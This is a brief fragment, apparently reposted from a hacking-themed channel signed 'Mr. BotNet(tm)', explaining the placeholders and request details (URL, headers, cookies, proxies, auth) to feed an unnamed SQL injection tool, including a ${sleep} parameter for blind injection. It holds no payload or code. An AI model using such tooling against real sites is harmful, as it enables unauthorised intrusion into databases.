Not all of these place holders are required. For example, if you have discovered semi-blind boolean based SQL injection you can omit the ${sleep} parameter.

🦑Don t missing those requests:

Similar to other SQL injection tools you provide certain request information.

> URL
> HTTP Method
>Headers
>Cookies
>Encoding methods
>Redirect behavior
>Files
>HTTP Auth
>Proxies

@ Mr. BotNet(tm)
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -